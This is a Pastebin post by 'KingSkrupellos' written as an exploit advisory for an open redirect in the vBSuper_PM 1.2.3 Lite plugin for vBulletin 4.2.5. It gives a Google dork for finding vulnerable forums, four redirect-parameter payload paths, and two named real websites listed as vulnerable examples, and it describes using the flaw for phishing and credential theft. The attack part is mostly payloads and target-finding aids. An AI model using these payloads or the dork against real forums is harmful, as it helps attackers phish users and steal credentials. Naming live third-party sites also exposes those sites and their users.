KingSkrupellos

vBulletin 4.2.5 vBSuper_PM 1.2.3 Lite Open Redirection

Mar 4th, 2019
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.36 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : vBulletin 4.2.5 vBSuper_PM 1.2.3 Lite Open Redirection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 04/03/2019
  7. # Vendor Homepage : vbulletin.com/org ~ dragonbyte-tech.com
  8. # Software Information Link : vbulletin.org/forum/showthread.php?p=2583345
  9. vbulletin.org/forum/member.php?u=373913
  10. # Software Affected Version : 1.2.3
  11. Compatible with vBulletin 4.x.x
  12. # Software Price Type : Free/Paid Download
  13. # Tested On : Windows and Linux
  14. # Category : WebApps
  15. # Exploit Risk : Medium
  16. # Google Dorks : intext:Super PM System provided by vBSuper_PM v1.2.3 (Lite)
  17. # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
  18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  21.  
  22. ####################################################################
  23.  
  24. # Description about Software :
  25. ***************************
  26. vBSuper PM's - Private Message Manager
  27.  
  28. Plain and simple, it is a full PM system enhancement.
  29.  
  30. It has many options for admins to control how the members use pm's on their site
  31.  
  32. ####################################################################
  33.  
  34. # Impact :
  35. *********
  36. This web application vBulletin 4.2.5 vBSuper_PM 1.2.3 accepts a user-controlled
  37.  
  38. input that specifies a link to an external site, and uses that link in a Redirect.
  39.  
  40. This simplifies phishing attacks. An http parameter may contain a URL value and could cause
  41.  
  42. the web application to redirect the request to the specified URL. By modifying the URL value
  43.  
  44. to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
  45.  
  46. Because the server name in the modified link is identical to the original site, phishing attempts
  47.  
  48. have a more trustworthy appearance.
  49.  
  50. Open redirect is a failure in that process that makes it possible for attackers to
  51.  
  52. steer users to malicious websites. This vulnerability is used in phishing attacks to get users
  53.  
  54. to visit malicious sites without realizing it. Web users often encounter redirection when they
  55.  
  56. visit the Web site of a company whose name has been changed or which has been acquired
  57.  
  58. by another company. Visiting unreal web page user's computer becomes affected by malware
  59.  
  60. the task of which is to deceive the valid actor and steal his personal data.
  61.  
  62. ####################################################################
  63.  
  64. # Open Redirection Exploit :
  65. **********************
  66. /redirect-to/?redirect=https://www.[REDIRECTION-ADDRESS].gov
  67.  
  68. /forums/redirect-to/?redirect=https://www.[REDIRECTION-ADDRESS].gov
  69.  
  70. /forum/redirect-to/?redirect=https://www.[REDIRECTION-ADDRESS].gov
  71.  
  72. /bbs/redirect-to/?redirect=https://www.[REDIRECTION-ADDRESS].gov
  73.  
  74. ####################################################################
  75.  
  76. # Example Vulnerable Sites :
  77. *************************
  78. [+] theflyfishingforum.com/forums/redirect-to/?redirect=https://cxsecurity.com
  79.  
  80. [+] mkiiisupra.net/bbs/redirect-to/?redirect=https://cxsecurity.com
  81.  
  82. ####################################################################
  83.  
  84. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  85.  
  86. ####################################################################
Add Comment
Please, Sign In to add comment